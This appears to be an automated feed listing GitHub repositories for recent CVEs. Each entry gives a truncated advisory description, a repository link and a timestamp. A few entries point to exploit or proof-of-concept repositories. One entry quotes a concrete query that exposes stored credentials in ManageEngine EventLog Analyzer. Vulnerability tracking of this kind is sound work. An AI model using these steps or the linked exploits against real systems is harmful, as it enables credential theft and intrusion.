**A Cleartext Storage of Sensitive Information vulnerability in suppportutils of SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Server 15, SUSE Linux Enterprise Server 15 SP3 allows attackers that get access to the support logs to gain knowledge of the stored credentials This issue affects: SUSE Linux Enterprise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45154](https://github.com/Live-Hack-CVE/CVE-2022-45154) create time: 2023-02-15T11:12:34Z

**An Incorrect Default Permissions vulnerability in saphanabootstrap-formula of SUSE Linux Enterprise Module for SAP Applications 15-SP1, SUSE Linux Enterprise Server for SAP 12-SP5; openSUSE Leap 15.4 allows local attackers to escalate to root by manipulating the sudo configuration that is created. This issue affects: S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45153](https://github.com/Live-Hack-CVE/CVE-2022-45153) create time: 2023-02-15T11:12:30Z

**Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42735](https://github.com/Live-Hack-CVE/CVE-2022-42735) create time: 2023-02-15T11:12:27Z

**PaloAlto EXP(CVE-2017-15944)** : [CKevens/PaloAlto_EXP](https://github.com/CKevens/PaloAlto_EXP) create time: 2023-02-15T08:38:02Z

**An issue was discovered in Zoho ManageEngine EventLog Analyzer 10.0 SP1 before Build 12110. By running "select hostdetails from hostdetails" at the /event/runquery.do endpoint, it is possible to bypass the security restrictions that prevent even administrative users from viewing credential data stored in the database, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19774](https://github.com/Live-Hack-CVE/CVE-2019-19774) create time: 2023-02-15T06:48:20Z

**Pivotal RabbitMQ, versions prior to v3.7.18, and RabbitMQ for PCF, versions 1.15.x prior to 1.15.13, versions 1.16.x prior to 1.16.6, and versions 1.17.x prior to 1.17.3, contain two components, the virtual host limits page, and the federation management UI, which do not properly sanitize user input. A remote authentic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11281](https://github.com/Live-Hack-CVE/CVE-2019-11281) create time: 2023-02-15T06:48:16Z

**A security vulnerability exists in the Zingbox Inspector versions 1.280 and earlier, where authentication is not required when binding the Inspector instance to a different customer tenant. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15018](https://github.com/Live-Hack-CVE/CVE-2019-15018) create time: 2023-02-15T06:48:13Z

**A security vulnerability exists in the Zingbox Inspector versions 1.293 and earlier, that could allow an attacker to supply an invalid software update image to the Zingbox Inspector that could result in command injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15020](https://github.com/Live-Hack-CVE/CVE-2019-15020) create time: 2023-02-15T06:48:08Z

**A security vulnerability exists in the Zingbox Inspector versions 1.294 and earlier, that could allow an attacker to supply an invalid software update image to the Zingbox Inspector. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15019](https://github.com/Live-Hack-CVE/CVE-2019-15019) create time: 2023-02-15T06:48:04Z

**A security vulnerability exists in Zingbox Inspector versions 1.294 and earlier, that results in passwords for 3rd party integrations being stored in cleartext in device configuration. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15023](https://github.com/Live-Hack-CVE/CVE-2019-15023) create time: 2023-02-15T06:48:01Z

**A security vulnerability exists in Zingbox Inspector versions 1.294 and earlier, that allows for the Inspector to be susceptible to ARP spoofing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15022](https://github.com/Live-Hack-CVE/CVE-2019-15022) create time: 2023-02-15T06:47:57Z

**A security vulnerability exists in Zingbox Inspector version 1.293 and earlier, that allows for remote code execution if the Inspector were sent a malicious command from the Zingbox cloud, or if the Zingbox Inspector were tampered with to connect to an attacker's cloud endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1584](https://github.com/Live-Hack-CVE/CVE-2019-1584) create time: 2023-02-15T06:47:53Z

**The St-Daily-Tip WordPress plugin through 4.7 does not have any CSRF check in place when saving its 'Default Text to Display if no tips' setting, and was also lacking sanitisation as well as escaping before outputting it the page. This could allow attacker to make logged in administrators set a malicious payload in it, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24487](https://github.com/Live-Hack-CVE/CVE-2021-24487) create time: 2023-02-15T06:48:28Z

**In the VikRentCar Car Rental Management System WordPress plugin before 1.1.7, there is a custom filed option by which we can manage all the fields that the users will have to fill in before saving the order. However, the field name is not sanitised or escaped before being output back in the page, leading to a stored Cr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24388](https://github.com/Live-Hack-CVE/CVE-2021-24388) create time: 2023-02-15T06:48:24Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the SdHostDriver buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated by using IOMMU protection for the ACPI r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32953](https://github.com/Live-Hack-CVE/CVE-2022-32953) create time: 2023-02-15T06:47:41Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the AhciBusDxe shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32476](https://github.com/Live-Hack-CVE/CVE-2022-32476) create time: 2023-02-15T06:47:37Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the HddPassword shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32473](https://github.com/Live-Hack-CVE/CVE-2022-32473) create time: 2023-02-15T06:47:34Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the FwBlockServiceSmm shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32470](https://github.com/Live-Hack-CVE/CVE-2022-32470) create time: 2023-02-15T06:47:30Z

**Reflected Cross Site Scripting in Search Functionality of Module Library in Pandora FMS Console v766 and lower. This vulnerability arises on the forget password functionality in which parameter username does not proper input validation/sanitization thus results in executing malicious JavaScript payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47373](https://github.com/Live-Hack-CVE/CVE-2022-47373) create time: 2023-02-15T06:47:23Z

**Stored cross-site scripting vulnerability in the Create event section in Pandora FMS Console v766 and lower. An attacker typically exploits this vulnerability by injecting XSS payloads on popular pages of a site or passing a link to a victim, tricking them into viewing the page that contains the stored XSS payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47372](https://github.com/Live-Hack-CVE/CVE-2022-47372) create time: 2023-02-15T06:47:19Z

**Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artica PFMS Pandora FMS v765 on all allows Cross-Site Scripting (XSS). A user with edition privileges can create a Payload in the reporting dashboard module. An admin user can observe the Payload without interaction an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45437](https://github.com/Live-Hack-CVE/CVE-2022-45437) create time: 2023-02-15T06:47:16Z

**Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artica PFMS Pandora FMS v765 on all platforms, allows Cross-Site Scripting (XSS). As a manager privilege user , create a network map containing name as xss payload. Once created, admin user must click on the edit netwo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45436](https://github.com/Live-Hack-CVE/CVE-2022-45436) create time: 2023-02-15T06:47:12Z

**All versions of the package github.com/usememos/memos/server are vulnerable to Cross-site Scripting (XSS) due to insufficient checks on external resources, which allows malicious actors to introduce links starting with a javascript: scheme. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25978](https://github.com/Live-Hack-CVE/CVE-2022-25978) create time: 2023-02-15T06:47:09Z

**In s2mpg11_pmic_probe of s2mpg11-regulator.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-259323 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20949](https://github.com/Live-Hack-CVE/CVE-2023-20949) create time: 2023-02-15T06:47:48Z

**In permissions of AndroidManifest.xml, there is a possible way to grant signature permissions due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-24 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20927](https://github.com/Live-Hack-CVE/CVE-2023-20927) create time: 2023-02-15T06:47:44Z

**PC settings tool Ver10.1.26.0 and earlier, PC settings tool Ver11.0.22.0 and earlier allows a attacker to write to the registry as administrator privileges with standard user privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25011](https://github.com/Live-Hack-CVE/CVE-2023-25011) create time: 2023-02-15T06:47:27Z

**poc** : [Small-ears/CVE-2023-0297](https://github.com/Small-ears/CVE-2023-0297) create time: 2023-02-15T06:28:40Z

**LexisNexis Firco Compliance Link 3.7 allows CSRF. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29557](https://github.com/Live-Hack-CVE/CVE-2022-29557) create time: 2023-02-15T02:17:38Z

**Git for Windows is the Windows port of the revision control system Git. Prior to Git for Windows version 2.39.2, when `gitk` is run on Windows, it potentially runs executables from the current directory inadvertently, which can be exploited with some social engineering to trick users into running untrusted code. A patc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23618](https://github.com/Live-Hack-CVE/CVE-2023-23618) create time: 2023-02-15T02:18:05Z

**Visual Studio Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23381](https://github.com/Live-Hack-CVE/CVE-2023-23381) create time: 2023-02-15T02:18:01Z

**Git for Windows is the Windows port of the revision control system Git. Prior to Git for Windows version 2.39.2, by carefully crafting DLL and putting into a subdirectory of a specific name living next to the Git for Windows installer, Windows can be tricked into side-loading said DLL. This potentially allows users wit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22743](https://github.com/Live-Hack-CVE/CVE-2023-22743) create time: 2023-02-15T02:17:58Z

**The ipxitf_ioctl function in net/ipx/af_ipx.c in the Linux kernel through 4.11.1 mishandles reference counts, which allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a failed SIOCGIFADDR ioctl call for an IPX interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7487](https://github.com/Live-Hack-CVE/CVE-2017-7487) create time: 2023-02-15T00:05:47Z

**In the Linux kernel before version 4.12, Kerberos 5 tickets decoded when using the RXRPC keys incorrectly assumes the size of a field. This could lead to the size-remaining variable wrapping and the data pointer going over the end of the buffer. This could possibly lead to memory corruption and possible privilege escal CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7482](https://github.com/Live-Hack-CVE/CVE-2017-7482) create time: 2023-02-15T00:05:43Z

**The brcmf_cfg80211_mgmt_tx function in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux kernel before 4.12.3 allows local users to cause a denial of service (buffer overflow and system crash) or possibly gain privileges via a crafted NL80211_CMD_FRAME Netlink packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7541](https://github.com/Live-Hack-CVE/CVE-2017-7541) create time: 2023-02-15T00:05:39Z

**Use-after-free vulnerability in fs/crypto/ in the Linux kernel before 4.10.7 allows local users to cause a denial of service (NULL pointer dereference) or possibly gain privileges by revoking keyring keys being used for ext4, f2fs, or ubifs encryption, causing cryptographic transform objects to be freed prematurely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7374](https://github.com/Live-Hack-CVE/CVE-2017-7374) create time: 2023-02-15T00:05:36Z

**A vulnerability was found in paxswill EVE Ship Replacement Program 0.12.11. It has been rated as problematic. This issue affects some unknown processing of the file src/evesrp/views/api.py of the component User Information Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36660](https://github.com/Live-Hack-CVE/CVE-2020-36660) create time: 2023-02-15T00:05:10Z

**Windows Graphics Component Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21823](https://github.com/Live-Hack-CVE/CVE-2023-21823) create time: 2023-02-15T00:06:14Z

**Visual Studio Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21815](https://github.com/Live-Hack-CVE/CVE-2023-21815) create time: 2023-02-15T00:06:10Z

**.NET and Visual Studio Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21808](https://github.com/Live-Hack-CVE/CVE-2023-21808) create time: 2023-02-15T00:06:07Z

**Microsoft Dynamics Unified Service Desk Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21778](https://github.com/Live-Hack-CVE/CVE-2023-21778) create time: 2023-02-15T00:06:03Z

**Visual Studio Denial of Service Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21567](https://github.com/Live-Hack-CVE/CVE-2023-21567) create time: 2023-02-15T00:05:59Z

**Visual Studio Elevation of Privilege Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21566](https://github.com/Live-Hack-CVE/CVE-2023-21566) create time: 2023-02-15T00:05:54Z

**Azure DevOps Server Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21553](https://github.com/Live-Hack-CVE/CVE-2023-21553) create time: 2023-02-15T00:05:51Z

**Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via embedding videos in the language component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23074](https://github.com/Live-Hack-CVE/CVE-2023-23074) create time: 2023-02-15T00:05:26Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25724](https://github.com/Live-Hack-CVE/CVE-2023-25724) create time: 2023-02-15T00:05:20Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25723](https://github.com/Live-Hack-CVE/CVE-2023-25723) create time: 2023-02-15T00:05:17Z

**Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21699](https://github.com/Live-Hack-CVE/CVE-2023-21699) create time: 2023-02-14T21:55:21Z

**Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21697](https://github.com/Live-Hack-CVE/CVE-2023-21697) create time: 2023-02-14T21:55:18Z

**Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21695](https://github.com/Live-Hack-CVE/CVE-2023-21695) create time: 2023-02-14T21:55:14Z

**Windows Fax Service Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21694](https://github.com/Live-Hack-CVE/CVE-2023-21694) create time: 2023-02-14T21:55:10Z

**Microsoft PostScript Printer Driver Information Disclosure Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21693](https://github.com/Live-Hack-CVE/CVE-2023-21693) create time: 2023-02-14T21:55:07Z

**Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21692](https://github.com/Live-Hack-CVE/CVE-2023-21692) create time: 2023-02-14T21:55:03Z

**Microsoft Protected Extensible Authentication Protocol (PEAP) Information Disclosure Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21691](https://github.com/Live-Hack-CVE/CVE-2023-21691) create time: 2023-02-14T21:55:00Z

**Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21690](https://github.com/Live-Hack-CVE/CVE-2023-21690) create time: 2023-02-14T21:54:56Z

**Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21689](https://github.com/Live-Hack-CVE/CVE-2023-21689) create time: 2023-02-14T21:54:53Z

**NT OS Kernel Elevation of Privilege Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21688](https://github.com/Live-Hack-CVE/CVE-2023-21688) create time: 2023-02-14T21:54:49Z

**HTTP.sys Information Disclosure Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21687](https://github.com/Live-Hack-CVE/CVE-2023-21687) create time: 2023-02-14T21:54:46Z

**Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21686](https://github.com/Live-Hack-CVE/CVE-2023-21686) create time: 2023-02-14T21:54:43Z

**Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21685](https://github.com/Live-Hack-CVE/CVE-2023-21685) create time: 2023-02-14T21:54:39Z

**Microsoft PostScript Printer Driver Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21684](https://github.com/Live-Hack-CVE/CVE-2023-21684) create time: 2023-02-14T21:54:36Z

**Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21573](https://github.com/Live-Hack-CVE/CVE-2023-21573) create time: 2023-02-14T21:54:33Z

**Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21572](https://github.com/Live-Hack-CVE/CVE-2023-21572) create time: 2023-02-14T21:54:29Z

**Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21571](https://github.com/Live-Hack-CVE/CVE-2023-21571) create time: 2023-02-14T21:54:25Z

**Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21570](https://github.com/Live-Hack-CVE/CVE-2023-21570) create time: 2023-02-14T21:54:22Z

**Microsoft SQL Server Integration Service (VS extension) Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21568](https://github.com/Live-Hack-CVE/CVE-2023-21568) create time: 2023-02-14T21:54:18Z

**Azure DevOps Server Cross-Site Scripting Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21564](https://github.com/Live-Hack-CVE/CVE-2023-21564) create time: 2023-02-14T21:54:15Z

**Microsoft Exchange Server Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21529](https://github.com/Live-Hack-CVE/CVE-2023-21529) create time: 2023-02-14T21:54:11Z

**Microsoft SQL Server Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21528](https://github.com/Live-Hack-CVE/CVE-2023-21528) create time: 2023-02-14T21:54:08Z

**HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25725](https://github.com/Live-Hack-CVE/CVE-2023-25725) create time: 2023-02-14T21:54:04Z

**The packet_set_ring function in net/packet/af_packet.c in the Linux kernel through 4.10.6 does not properly validate certain block-size data, which allows local users to cause a denial of service (integer signedness error and out-of-bounds write), or gain privileges (if the CAP_NET_RAW capability is held), via crafted CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7308](https://github.com/Live-Hack-CVE/CVE-2017-7308) create time: 2023-02-14T19:39:06Z

**The Hawk Console component of TIBCO Software Inc.'s TIBCO Hawk and TIBCO Operational Intelligence Hawk RedTail contains a vulnerability that will return the EMS transport password and EMS SSL password to a privileged user. Affected releases are TIBCO Software Inc.'s TIBCO Hawk: versions 6.2.1 and below and TIBCO Operat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41564](https://github.com/Live-Hack-CVE/CVE-2022-41564) create time: 2023-02-14T19:39:31Z

**The 0mk Shortener plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.2. This is due to missing or incorrect nonce validation on the zeromk_options_page function. This makes it possible for unauthenticated attackers to inject malicious web scripts via the 'zeromk_user' a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2933](https://github.com/Live-Hack-CVE/CVE-2022-2933) create time: 2023-02-14T19:39:27Z

**Improper access control in the Intel(R) oneAPI DPC++/C++ Compiler before version 2022.2.1 for some Intel(R) oneAPI Toolkits before version 2022.3.1 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40196](https://github.com/Live-Hack-CVE/CVE-2022-40196) create time: 2023-02-14T19:39:24Z

**Uncontrolled search path in the Intel(R) oneAPI DPC++/C++ Compiler before version 2022.2.1 for some Intel(R) oneAPI Toolkits before version 2022.3.1 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38136](https://github.com/Live-Hack-CVE/CVE-2022-38136) create time: 2023-02-14T19:39:20Z

**Improper buffer restrictions the Intel(R) C++ Compiler Classic before version 2021.7.1. for some Intel(R) oneAPI Toolkits before version 2022.3.1 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41342](https://github.com/Live-Hack-CVE/CVE-2022-41342) create time: 2023-02-14T19:39:17Z

**A vulnerability classified as problematic has been found in eXo Chat Application. Affected is an unknown function of the file application/src/main/webapp/vue-app/components/ExoChatMessageComposer.vue of the component Mention Handler. The manipulation leads to cross site scripting. It is possible to launch the attack re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4902](https://github.com/Live-Hack-CVE/CVE-2022-4902) create time: 2023-02-14T19:39:13Z

**In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705035; Issue ID: GN20220705035. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32656](https://github.com/Live-Hack-CVE/CVE-2022-32656) create time: 2023-02-14T19:38:57Z

**IBM App Connect Enterprise 11.0.0.17 through 11.0.0.19 and 12.0.4.0 and 12.0.5.0 contains an unspecified vulnerability in the Discovery Connector nodes which may cause a 3rd party system’s credentials to be exposed to a privileged attacker. IBM X-Force ID: 238211. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42439](https://github.com/Live-Hack-CVE/CVE-2022-42439) create time: 2023-02-14T19:38:54Z

**no description** : [ticofookfook/CVE-2023-25136](https://github.com/ticofookfook/CVE-2023-25136) create time: 2023-02-14T20:13:16Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the ‘kvstore_client’ REST endpoint lets a potential attacker update SSG [App Key Value Store (KV store)](https://docs.splunk.com/Documentation/Splunk/latest/Admin/AboutKVstore) collectio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22942](https://github.com/Live-Hack-CVE/CVE-2023-22942) create time: 2023-02-14T19:40:15Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a [Field Transformation](https://docs.splunk.com/Documentation/Splunk/latest/Knowledge/Managefieldtransforms) crashes the Splunk daemon (splunkd). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22941](https://github.com/Live-Hack-CVE/CVE-2023-22941) create time: 2023-02-14T19:40:12Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, aliases of the ‘collect’ search processing language (SPL) command, including ‘summaryindex’, ‘sumindex’, ‘stash’,’ mcollect’, and ‘meventcollect’, were not designated as safeguarded commands. The commands could potentially allow for the exposing of data to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22940](https://github.com/Live-Hack-CVE/CVE-2023-22940) create time: 2023-02-14T19:40:08Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the ‘map’ search processing language (SPL) command lets a search [bypass SPL safeguards for risky commands](https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards). The vulnerability requires a higher privileged user to initiate a reques CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22939](https://github.com/Live-Hack-CVE/CVE-2023-22939) create time: 2023-02-14T19:40:04Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the ‘sendemail’ REST API endpoint lets any authenticated user send an email as the Splunk instance. The endpoint is now restricted to the ‘splunk-system-user’ account on the local instance. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22938](https://github.com/Live-Hack-CVE/CVE-2023-22938) create time: 2023-02-14T19:40:00Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the lookup table upload feature let a user upload lookup tables with unnecessary filename extensions. Lookup table file extensions may now be one of the following only: .csv, .csv.gz, .kmz, .kml, .mmdb, or .mmdb.gzl. For more information on lookup table fil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22937](https://github.com/Live-Hack-CVE/CVE-2023-22937) create time: 2023-02-14T19:39:57Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the ‘search_listener’ parameter in a search allows for a blind server-side request forgery (SSRF) by an authenticated user. The initiator of the request cannot see the response without the presence of an additional vulnerability within the environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22936](https://github.com/Live-Hack-CVE/CVE-2023-22936) create time: 2023-02-14T19:39:54Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the ‘display.page.search.patterns.sensitivity’ search parameter lets a search bypass [SPL safeguards for risky commands](https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards). The vulnerability requires a higher privileged user to init CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22935](https://github.com/Live-Hack-CVE/CVE-2023-22935) create time: 2023-02-14T19:39:50Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the ‘pivot’ search processing language (SPL) command lets a search bypass [SPL safeguards for risky commands](https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards) using a saved search job. The vulnerability requires an authenticated u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22934](https://github.com/Live-Hack-CVE/CVE-2023-22934) create time: 2023-02-14T19:39:46Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting (XSS) in an extensible mark-up language (XML) View through the ‘layoutPanel’ attribute in the ‘module’ tag’. The vulnerability affects instances with Splunk Web enabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22933](https://github.com/Live-Hack-CVE/CVE-2023-22933) create time: 2023-02-14T19:39:43Z

**In Splunk Enterprise 9.0 versions before 9.0.4, a View allows for Cross-Site Scripting (XSS) through the error message in a Base64-encoded image. The vulnerability affects instances with Splunk Web enabled. It does not affect Splunk Enterprise versions below 9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22932](https://github.com/Live-Hack-CVE/CVE-2023-22932) create time: 2023-02-14T19:39:39Z

**In Splunk Enterprise versions below 8.1.13 and 8.2.10, the ‘createrss’ external search command overwrites existing Resource Description Format Site Summary (RSS) feeds without verifying permissions. This feature has been deprecated and disabled by default. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22931](https://github.com/Live-Hack-CVE/CVE-2023-22931) create time: 2023-02-14T19:39:35Z

**Nextcloud mail is an email app for the nextcloud home server platform. In versions prior to 2.2.2 user's passwords were stored in cleartext in the database during the duration of OAuth2 setup procedure. Any attacker or malicious user with access to the database would have access to these user passwords until the OAuth CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23944](https://github.com/Live-Hack-CVE/CVE-2023-23944) create time: 2023-02-14T19:39:09Z

